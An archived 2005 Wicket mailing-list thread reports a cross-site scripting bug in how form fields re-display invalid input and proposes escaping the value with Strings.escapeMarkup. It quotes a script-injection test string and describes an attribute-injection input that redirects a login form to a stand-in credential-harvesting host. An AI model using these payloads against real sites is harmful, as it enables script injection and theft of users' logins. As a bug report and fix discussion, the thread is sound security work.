This problem is not only a security problem, but also a bug :
Indeed, please go to the Wicket Examples, and try this: (http://www.wicket-library.com/wicket-examples/index.html
)
- enter this in the first textfield of the forminput example : My team's name is "Wicket's team"
- Then erase the value of the Integer textfield (in order to generate an invalid input).
- Submit the form
You can see that the form will not be correctly re-displayed ( check the content of the String textfield)
The problem may be solved by replacing the FormComponent.getValue() method return statement :
return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : invalidInput;
by this one:
return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : Strings.escapeMarkup(invalidInput);
( Please note that Component.getModelObjectAsString() (html) escapes the value of the model)
HTH,
--
Laurent
On 11/24/05, Johannes Fahrenkrug <[EMAIL PROTECTED]> wrote:
Johan Compagner wrote:
> so when i have this:
>
> x = 6 < 7 & 10 > 5
>
> as text in my model it gets encoded into html? (And thats what i see?)
> That is something i don't want
No, I think this would be the right thing to do:
the value of the model is x = 6 < 7 & 10 > 5
but as soon as wicket renders the page and the value of the input field
that the model is attached to,
it should render the value as x = 6 < 7 & 10 > 5
so that the html source will read
<input type="text" value="x = 6 < 7 & 10 > 5">
instead of
<input type="text" value="x = 6 < 7 & 10 > 5">
special chars should only be RENDERED as html entities, not saved as
html entities in the model.
>
> The problem you describe is i think the " at the beginning that makes
> it all possible,
> (else it was just a text value of the value attribute)
the " makes it possible to break out of the value parameter of the input
field. That could pose a security risk, though.
Imagine this: You have a login form that saves the username in case the
login failed and the page is reloaded.
Some malicious person opens the login page and enters this:
"
href="">http://loginAndPasswordHarvester.com'
dummy="
He sends off the form, it gets reloaded because the "login" is invalid
and he leaves the terminal for someone else to login.
When someone else trys to log in, their username and password get sent
to a different server.
So I guess rendering special characters as html entities might be a good
idea.
Cheers,
Johannes.
>
> johan
>
>
> On 11/24/05, *Johannes Fahrenkrug* < [EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>> wrote:
>
> Hi,
>
> I have built several forms using Wicket. Just out of curiosity I
> tried
> to enter the following line into a text field:
>
> "><script>alert('Soylent Green Is People');</script test="
>
> When I reload the form, the _javascript_ code gets executed. Shouldn't
> such special characters be converted to HTML entities when the
> page gets
> parsed? (You know < instead of < and so forth)
>
> Cheers,
>
> Johannes.
>
>
> -------------------------------------------------------
> This SF.net email is sponsored by: Splunk Inc. Do you grep through
> log files
> for problems? Stop! Download the new AJAX search engine that makes
> searching your log files as easy as surfing the web. DOWNLOAD
> SPLUNK!
> http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
> <http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click>
> _______________________________________________
> Wicket-user mailing list
> [email protected]
> <mailto:[email protected] >
> https://lists.sourceforge.net/lists/listinfo/wicket-user
>
>
-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
_______________________________________________
Wicket-user mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/wicket-user
